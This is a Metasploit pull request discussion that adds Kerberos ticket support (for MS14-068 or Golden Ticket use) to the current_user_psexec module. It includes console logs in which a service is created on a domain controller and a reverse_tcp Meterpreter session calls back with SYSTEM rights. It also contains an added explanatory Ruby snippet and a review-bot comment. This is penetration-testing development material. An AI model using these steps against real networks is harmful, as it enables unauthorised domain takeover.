
Current User Psexec - Kerberos Support (MS14-068) #4357

Merged: 1 commit, Dec 24, 2014

Conversation

Meatballs1 (Contributor)

Currently after importing a Kerberos token with the kiwi extension, attempts to exploit hosts using the current_user_psexec local exploit module will fail. This is due to the Kerberos requirement to associate with the hostname.

This adds a KERBEROS datastore option which will prevent the hostnames from being resolved locally, and instead send the hostnames over to the remote host. TBH we probably shouldn't be resolving anything locally for 'local' exploits. This should all be done on the remote host?

20141210-22:17 - 192.168.153.133 exploit(current_user_psexec) > rerun
[*] Reloading module...

[*] [2014.12.10-22:17:22] Started reverse handler on 172.16.80.225:8888 
[*] [2014.12.10-22:17:22] msfdc01          Creating service kWfrGWFDDd
[*] [2014.12.10-22:17:23] msfdc01          Starting the service
[*] [2014.12.10-22:17:24] msfdc01          Deleting the service
[*] [2014.12.10-22:17:26] Sending stage (770048 bytes) to 172.16.80.10
[*] Meterpreter session 5 opened (172.16.80.225:8888 -> 172.16.80.10:63815) at 2014-12-10 22:17:43 +0000

Verification

  • Import a Domain Admin Kerberos Ticket (MS14-068/Golden Ticket etc)
  • Run module against the Domain Controller using either DNS name or IP address in RHOSTS - will get an access denied error 5
  • Apply this PR
  • Set KERBEROS TRUE and set the RHOST to the DNS name of the target host.

Fixes

#4348
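As an added illustration of the KERBEROS switch described in the PR text (example code written for this page, not the module's or Meatballs1's own): with KERBEROS set, every RHOSTS entry is kept exactly as typed so the remote host resolves it and the name-bound service ticket can match, and IP literals are refused up front because that is the case the description reports as failing with access denied; without it, addresses and CIDR blocks are expanded locally and plain names are left for the local resolver. `split_rhosts`, `ip_literal?` and `build_targets` are hypothetical helper names, and the `IPAddr`-based expansion is a constructed stand-in for `Rex::Socket::RangeWalker`.

```ruby
require 'ipaddr'

# Added example, not the Metasploit module's code. split_rhosts, ip_literal?
# and build_targets are hypothetical names; the CIDR expansion below is a
# constructed substitute for Rex::Socket::RangeWalker.

# Split an RHOSTS string on commas and/or whitespace ("dc01, dc02 web01"),
# dropping empty fields left by doubled separators.
def split_rhosts(rhosts)
  rhosts.to_s.split(/[,\s]+/).reject(&:empty?)
end

# True for an IPv4/IPv6 literal or CIDR block, false for a DNS name.
# IPAddr never resolves names, so this check stays offline.
def ip_literal?(entry)
  IPAddr.new(entry)
  true
rescue ArgumentError
  false
end

# Build the list of targets the module should iterate over.
#
# kerberos: true  -> entries are kept exactly as typed so the remote host
#                    resolves them itself and the service ticket, which is
#                    bound to a host name, can match. IP literals are rejected
#                    because no ticket is issued for an address; with them the
#                    SMB logon fails with access denied.
# kerberos: false -> addresses and CIDR blocks are expanded locally and plain
#                    host names are left for the local resolver (the pre-PR
#                    behaviour).
def build_targets(rhosts, kerberos: false)
  entries = split_rhosts(rhosts)
  raise ArgumentError, 'RHOSTS is empty' if entries.empty?

  if kerberos
    literals = entries.select { |e| ip_literal?(e) }
    unless literals.empty?
      raise ArgumentError,
            "KERBEROS needs DNS names, not IP literals: #{literals.join(', ')}"
    end
    return entries
  end

  entries.flat_map do |e|
    ip_literal?(e) ? IPAddr.new(e).to_range.map(&:to_s) : [e]
  end
end

if $PROGRAM_NAME == __FILE__
  p build_targets('dc01.demo.local, dc02.demo.local', kerberos: true)
  p build_targets('172.16.80.8/30')
  begin
    build_targets('172.16.80.10', kerberos: true)
  rescue ArgumentError => e
    warn "refused: #{e.message}"
  end
end
```

Refusing IP literals in Kerberos mode turns the silent "access denied, error 5" from the verification steps into an immediate, explained option error before any service is created on the target.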

@jvazquez-r7 (Contributor)

I'll work on it, hopefully today. Tomorrow as late!

About the question "TBH we probably shouldn't be resolving anything locally for 'local' exploits. This should all be done on the remote host?": I agree, resolving RHOST locally for local exploits can be a hassle. Will check when reviewing what can be done. Thanks @Meatballs1 for the PR!

@@ -102,7 +103,13 @@ def exploit
end

begin
Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
if datastore['KERBEROS']
targets = datastore['RHOSTS'].split(', ').map{ |a| a.split(' ') }.flatten
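Review bot: the KERBEROS branch's `targets = datastore['RHOSTS'].split(', ').map{ |a| a.split(' ') }.flatten` only separates entries on a comma followed by a space or on whitespace, so `dc01,dc02` with no space stays one entry and is handed to the remote host as a single bogus name; a single `datastore['RHOSTS'].split(/[,\s]+/).reject(&:empty?)` covers both separators and drops empty fields. The branch also accepts IP literals without comment, although the PR description states those still fail under Kerberos with access denied (error 5); rejecting non-DNS-name entries with a clear message when KERBEROS is set would surface that misconfiguration before any service is created on the target.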
Contributor

I guess it was trying to avoid DNS resolution when authenticating via Kerberos, but I don't think it solves the issue, because DNS resolution already happens on datastore option validation. Right or am I forgetting something?

Contributor

No matter; after testing, I get the idea here :) Yeah, local resolution would waste it when running the module! Tested successfully! Landing!

@jvazquez-r7 (Contributor)

Tested okay:

msf exploit(handler) > use exploit/windows/local/current_user_psexec
msf exploit(current_user_psexec) > set TECHNIQUE PSH
TECHNIQUE => PSH
msf exploit(current_user_psexec) > set KERBEROS true
KERBEROS => true
msf exploit(current_user_psexec) > set SESSION 1
SESSION => 1
msf exploit(current_user_psexec) > set RHOSTS WIN-F46QAN3U3UH.demo.local
RHOSTS => WIN-F46QAN3U3UH.demo.local
msf exploit(current_user_psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(current_user_psexec) > set LHOST 172.16.158.1
LHOST => 172.16.158.1
msf exploit(current_user_psexec) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] WIN-F46QAN3U3UH.demo.local Creating service DPdDWO7bun
[*] WIN-F46QAN3U3UH.demo.local Starting the service
[*] WIN-F46QAN3U3UH.demo.local Deleting the service
[*] Sending stage (770048 bytes) to 172.16.158.135

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

@jvazquez-r7 jvazquez-r7 merged commit c813c11 into rapid7:master Dec 24, 2014
@Meatballs1 Meatballs1 deleted the kerb_curr_psexec branch December 24, 2014 10:16